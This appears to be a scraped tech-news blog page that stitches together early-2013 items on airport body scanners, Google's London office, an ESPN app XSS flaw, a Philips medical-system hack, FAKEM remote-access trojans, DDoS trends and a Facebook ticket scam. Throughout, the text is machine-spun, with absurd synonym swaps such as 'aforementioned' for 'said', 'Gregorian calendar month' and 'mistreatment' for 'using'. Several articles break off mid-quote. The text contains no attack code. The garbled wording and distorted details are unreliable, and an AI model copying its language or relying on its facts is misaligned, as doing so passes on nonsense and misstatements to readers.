In a laconic statement issued on Thursday, the agency aforementioned it had terminated its contract with Rapiscan, the maker of the disputed scanners, as a result of the corporate was unable to deliver devices incorporating machine-driven Target Recognition (ATR) software package by Gregorian calendar month 2013, PRN by law.

ATR replaces the extremely elaborated pictures ordinarily provided by the scanners with a generic define of somebody's body. something that appears sort of a hidden object to the scanner is displayed as a imprecise form superimposed over the realm of the traveler\'s body wherever the thing can be found.

What’s a computer? Eat yourself fitter!


Something for the Weekend, Sir? Despite the saturation of oh-so-hilarious pre-Christmas comedy TV shows summary the year before it has really finished, Gregorian calendar month strikes Maine as the additional logical time to try and do like Antony Worrall Thompson: have a good glance through, scrutinize and move. In Gregorian calendar month, we have a tendency to wallowed in the athletic contest and something to try and do with Sgt Pepper’s grandparent on a ship throughout a violent storm. January, on the other hand, is our chance to think back on the innumerable shit things that happened while convincing ourselves that next year couldn’t possibly be any worse.

Google sinks millions into plush new £1bn London HQ


Google's new digs in Blighty's capital - as wide expected - are being inbuilt Kings Cross, London, the corporate has confirmed.

The world's biggest ad broker is reportedly sinking £650m into its new home.

The company's United Kingdom of Great Britain and Northern Ireland headquarters are currently in Victoria, however the lease for that building runs move into 2016.

It's been speculated that Google's new military installation, that is on a two.4 acre plot at the Kings Cross Central development, are price a cool £1bn by the time work on that is completed.

Construction on the site can begin later this year on a building that will "range in height" from seven to eleven storeys tall. Google said in a very statement that its New London home won't spoil its United Kingdom of Great Britain and Northern Ireland Oompa-Loompas who can apparently get pleasure from a "state of the art, flexible operating environment".

Meanwhile, Google's Northern and Central Europe veep Matt Brittin seemed to get his knickers in a very twist regarding where the worldwide internet was 1st hatched with this comment:

This is an enormous investment by Google, we’re committing more to the united kingdom - where computing and therefore the internet were fabricated. It’s good news for Google, for London and for the united kingdom.

Pedants can note the error: whereas a Brit - Sir Tim Berners Lee - did so invent the net, the magic did not happen on blighty turf.

As got wind by Reg reader Jonathan: "The precise location at CERN is seemingly in office in France with its entrance in Suisse."

What is cyberchondria?


You surfeited yourself on a large meal associated an hour later you're having some weird cramping pains in your chest. You head over to your computer and sort the symptom "chest pain" into your most popular programme. the primary result to crop up is -- heart failure?

Your curiosity escalates into anxiety as you scroll through pages that list heart attack symptoms as the precise ones you're having. over probably, what you're experiencing is not a heart failure at all -- it's the phenomenon of cyberchondria.

Why no one wants to Joyn GSMA's Skype-killing expedition


Operators ar haemorrhage revenue to immoderate players, and promise their hopes on the GSMA-based Joyn normal, but a year after launch platform developer OpenCloud thinks the GSMA might be the matter instead of the solution.

Not that the GMSA is deliberately frustrating innovation, but OpenCloud's Mark Windle reckons the culture of internationally agreed standards and glacial certification is fatally slowing development of operator solutions, putting them at the mercy of internet corporations UN agency will inevitably out-innovate and scale back operators to the status of bit pipes.
OpenCloud should grasp. It provides application servers to network operators from China to the USA, via Japan, and says that whereas the company's JSLEE-compatible servers provide the speedy development of recent applications, operators ar proving astonishingly slow to initiate within the most important area of their business: voice.

Google's Larry Page: MY SECRET TO VAST WEALTH, SUCCESS


Google chief Larry Page has shared the secret to his success: the wealthy person programme scholar reckons corporations should create their products 10 times better than their rivals to be successful.

The grin geek, worth about $20bn, additionally believes his fellow business barons ought to seldom have faith in their opponents once springing up with "moon shot" ideas, like Google's project to make cars that safely drive themselves.

"It’s laborious to seek out actual examples of very superb things that happened only because of competition," Page aforementioned in an exceedingly WiReD mag interview. The Google co-founder added:

Facebook's sexy pick 'n' mix OCP model is great... for Facebook


Blocks and Files Facebook's Open cypher Project (OCP) could doubtless destroy the business models of the mainstream server, storage and networking vendors. it is a shot to turn back time and come back to a pick-'n'-mix server, storage and networking world where suppliers blithely build to common interfaces, and element sets are not integrated for larger overall efficiency.

Facebook is its own massive systems measuring device, but the rest people don't seem to be and OCP standards adoption by enterprises could lead on to much more valuable IT element acquisition and implementation processes.

How do I arrive at now, a point where i'm trashing the spread of Facebook's terrific OCP ideas?

Top Gear isn't TV, not when it's on YouTube


Ofcom has overruled its appointed VOD regulator in deciding that chunks of high Gear and BBC Food channel programmes found on YouTube do not represent TV-like services and so fall outside regulation.

ATVOD, Ofcom-appointed regulator of uk video-on-demand, decided that clips circulated by BBC Worldwide represent TV content and so constitute its regulatory remit. BBC Worldwide contended they're promotional and so it had no ought to register with ATVOD (and pay the requisite fee) so each parties toddled along to Ofcom, that has decided that programmes without credits are not programmes all.

US general: Beware of Iran's Revolutionary Cyber-Guard


 Cyber-attacks on Islamic Republic of Iran have forced the country to reinforce its defences, with the result that the country's act of terrorism capabilities became far more advanced, a United States of America general has aforementioned.

General William Shelton, WHO heads up the United States of America cyber Ops, told reporters throughout a rendezvous that Islamic Republic of Iran had more experienced perennial worm attacks by quickly up its cyber-capabilities, the BBC, Reuters and others reported. 

The FBI Needs Hackers, Not Backdoors


Just imagine if all the applications and services you saw or detected about at CES last week had to be designed to be “wiretap ready” before they might be offered on the market. Before regular folks such as you or ME could use them.

Yet that’s a real chance. For the previous few years, the FBI’s been warning that its police investigation capabilities square measure “going dark,” as a result of web communications technologies — together with devices that hook up with the web — are getting too tough to intercept with current enforcement tools. so the Federal Bureau of Investigation desires a more wiretap-friendly web, and legislation to mandate it'll doubtless be proposed this year.

Security vulnerabilities in ESPN ScoreCenter mobile app


ESPN ScoreCenter, one in all the foremost widespread mobile sports apps on the market, has important security vulnerabilities that would compromise users’ mobile devices, including the threat of information thieving.

First, by displaying basic online page without properly sanitizing user-supplied input, ESPN SportsCenter exposes a cross-site scripting (XSS) flaw. Therefore, active content like JavaScript are often injected into the app.

Microsoft promises big shiny tool to cheer glum Windows resellers


 Microsoft has vowed to finish its reseller partners\' woes by fixing the unstable website accustomed register customer sales: by the tip of next month Redmond\'s deal-registration website are going to be upgraded and can embrace a replacement business intelligence and analytics tool.

The online system for inputting deals with IT patrons was launched for big account resellers (LARs) in december 2011, and because the answer Incentive Programme for the wider distribution channel last spring. By registering sales, resellers will get rebates and conjointly stop rivals from nicking customers.

Cash-ravenous Sony will flog Manhattan HQ for $1.1 BEELLION


Sony is ready to flog its sky-scraping US hq in Manhattan for $1.1bn to induce hold of some much-needed money.

After debts on the building are settled up, the recreation large expects to run away with $770m - that is $685m quite it procured it in 2002. However, by means of comparison, the firm recorded a $5.7bn internet loss for its last twelvemonth.

"Sony is enterprise a range of initiatives to strengthen its financial foundation and business competitiveness and for future growth," the company same in a very canned statement.

Google Declares War On the Password


 An anonymous reader writes

"Wired reports on an enquiry paper from Google employees concerning the long run of authentication on the online. 'Along with several within the trade, we feel passwords and easy bearer tokens like cookies are not any longer sufficient  to stay users safe,' the authors write. Their set up involves authenticating one time, to one device, then mistreatment that to unlock all of your other accounts. "We'd like your smartphone or smartcard-embedded finger ring to authorize a brand new pc via a faucet on the computer, even in things during which your phone can be without cellular property." Recognizing that this is not something they'll accomplish on their own, they've gone ahead and created a device-based authentication protocol that is 'independent of Google, requires no special software package to work — aside from an internet browser that supports the login normal — and which prevents websites from mistreatment this technology to trace users.

Paging Dr Evil: Philips medical device control kit 'easily hacked'


 Researchers have discovered security issues in management systems used to control X-ray machines and alternative medical devices.

Terry McCorkle and Billy Rios of security start-up Cylance used fuzzing approaches previously applied to unearth security holes in industrial control systems to search out how into the Xper data Management system from Philips.

The manoeuvre allowed the researchers to gain privileged user standing onto the medical data management system. "Anything thereon or what is connected thereto was in hand, too,\" Rios aforementioned throughout a presentation at Digital Bond’s annual SCADA Security Scientific symposium (S4) conference, which befell in Miami in the week.

Fujitsu Tech Solutions boss: I am an industry 'insurgent'


 Badboy michael Keegan plans to upset rivals, purloin biggest partners
Fujitsu Great Britain|kingdom} and Ireland important person michael Keegan is making an attempt to highlight and exploit any uncertainty close hollow and H.P. to persuade distribution partners sitting at those vendors\' prime tables.

Keegan, executive director of the Technology Product group is clearly in self-licking mode, armed with growth stats that reveal the extent of the vendor\'s progress since he took the job a handful of years agone.


Smarm-bot Siri seeks side-splitting script-writer for charm transplant Forget an Oscar or Bafta, Apple's offering the hottest writing gig in town

Siri screenshots, screengrab Shit Siri Says


A humorous  writer is being sought to form Apple's voice-activated personal assistant software Siri spout super-scintillating backchat. The chatty iOS app, that attempts to answer any queries and adjust commands spoken into Cupertino's latest iThings, is famous for its arbitrary responses to fanbois.

New RAT family makes its traffic look legitimate


RATs - Remote Access Trojans - are typically utilized by cyber attackers to take care of a position within the infected computers and build them do things unbeknownst to their homeowners.

But, so as to try and do that and not be noticed, RATs should use a series of obfuscation techniques.

Take for example the FAKEM RAT variants recently analyzed by Trend small researchers: so as to mix in, some attempt to build their network traffic seem like Windows traveller and Yahoo! traveller traffic, et al. as hypertext mark-up language. 

Usually delivered via spear phishing emails, once dead the malware copies itself mistreatment the into the this method folder.

When contacting and causation info to remote servers, the malicious traffic begins with headers just like actual Windows traveller and Yahoo! traveller traffic. however checking the traffic once it clearly shows its malicious nature.

ObjectRocket launches MongoDB cloud service


 ObjectRocket launched its quick and scalable  MongoDB database-as-a-service (DBaaS). The platform is specifically architected to produce a quick and inevitable MongoDB surroundings. every instance is backed by pure solid state disk for enormous I/O, is inherently sharded and resides on multiple redundant items of infrastructure.


Databases ar replicated and optionally exist in multiple geo-diverse knowledge centers. ObjectRocket additionally leverages AWS Direct connect with offer low latency and free information measure to AWS Customers.




Thursday, January 17, 2013

Large-scale DDoS attacks grow bigger and more diversified


 In addition to increasing attack sizes, attack volume grew in this fall 2012 and reached the very best range of attacks Prolexic has logged for one quarter, consistent with Prolexic.

Traditional Layer three and Layer four infrastructure attacks were the favored attack sort, accounting for seventy five p.c of total attacks throughout the quarter, with application layer attacks creating up the remaining twenty five p.c. This split has remained consistent throughout 2012.

This quarter, SYN (24 percent), GET (20 percent), ICMP (18 percent) and UDP (15 percent) floods were the attack sorts most frequently encountered throughout mitigation.

Wednesday, January 16, 2013

"Southwest Airlines giveaway" Facebook scam doing rounds

A new survey scam is targeting Facebook users, misusing the name of well-known Southwest Airlines to supposedly offer two free tickets to any destination within the U.S.

Users who follow the offered bit.ly shortened link will take them to a page that explains that the offer is due to the company celebrating its anniversary ("a decade of Southwest!").

Unfortunately for the users who take the aforementioned claim at face value and try to claim the tickets, they will be first faced with a doorway page and then redirected to different pages depending on their physical location.

All of a sudden, there is no mention of the free tickets any more - the new "prize" is a new iPad or MacBook Air! They only have to submit their email address and complete registration forms, and allow the collection, use and disclosure of their personal information to third parties for marketing purposes in order to receive "incredible gifts" (click on the screenshot to enlarge it):

    
Some of the users whose location obviously disqualifies them for receiving any kind of offer (even a bogus one) at all are faced with a generic “search results” page related to online gaming, warns GFI.

"Based on the bit.ly data of the URL, it is highly likely that this scam has been going around since the 14th of this month," they noted.
 

Count

About Me

HatHack flashes on the updated news on hacking the system which ranges from the computer to internet and network hacking. Hacking -- Taking control over any thing and every is hacking of that particular system. Start Hacking !!!!

Visits

Sample Text